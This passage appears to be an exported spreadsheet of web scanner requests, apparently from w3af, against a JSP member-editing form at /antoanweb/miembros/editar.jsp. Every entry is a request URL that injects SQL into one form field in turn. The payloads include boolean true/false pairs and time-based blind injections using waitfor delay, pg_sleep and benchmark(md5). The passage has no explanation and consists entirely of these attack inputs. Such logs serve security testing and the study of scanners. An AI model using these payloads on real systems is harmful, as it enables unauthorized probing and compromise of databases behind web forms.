    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1+or+pg_sleep(5)&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1'+or+pg_sleep(5)+or+'1'='1&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1"+or+pg_sleep(5)+or+"1"="1&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24"+or+"48"="48&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24"+and+"48"="49&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24'+or+'48'='48&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24'+and+'48'='49&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24+or+48=48+&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24+and+48=49+&amp;login=56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8"+or+"58"="58&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=58"+and+"58"="59&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=58'+or+'58'='58&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=58'+and+'58'='59&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=58+or+58=58+&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=58+and+58=59+&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1;waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1);waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1));waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1';waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1');waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1'));waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1+or+benchmark(2500000,md5(1))&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1+or+pg_sleep(5)&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1'+or+pg_sleep(5)+or+'1'='1&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1"+or+pg_sleep(5)+or+"1"="1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84"+or+"84"="84&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=84"+and+"84"="85&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=84'+or+'84'='84&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=84'+and+'84'='85&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=84+or+84=84+&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=84+and+84=85+&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1;waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1);waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1));waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1';waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1');waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1'));waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1+or+benchmark(2500000,md5(1))&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1+or+pg_sleep(5)&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1'+or+pg_sleep(5)+or+'1'='1&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1"+or+pg_sleep(5)+or+"1"="1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12"+or+"12"="12&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=12"+and+"12"="13&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=12'+or+'12'='12&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=12'+and+'12'='13&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=12+or+12=12+&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=12+and+12=13+&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1;waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1);waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1));waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1';waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1');waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1'));waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1+or+benchmark(2500000,md5(1))&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1+or+pg_sleep(5)&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1'+or+pg_sleep(5)+or+'1'='1&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1"+or+pg_sleep(5)+or+"1"="1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25"+or+"25"="25&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=25"+and+"25"="26&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=25'+or+'25'='25&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=25'+and+'25'='26&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=25+or+25=25+&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=25+and+25=26+&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1;waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1);waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1));waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1';waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1');waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1'));waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1+or+benchmark(2500000,md5(1))&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1+or+pg_sleep(5)&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1'+or+pg_sleep(5)+or+'1'='1&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1"+or+pg_sleep(5)+or+"1"="1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56&amp;email=w3af@email.com&amp;modo=insertar"+or+"76"="76</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar"+and+"76"="77</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar'+or+'76'='76</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar'+and+'76'='77</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1;waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1);waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1';waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1');waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1'));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1+or+benchmark(2500000,md5(1))</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1'+or+benchmark(2500000,md5(1))+or+'1'='1</t>
  </si>
  <si>
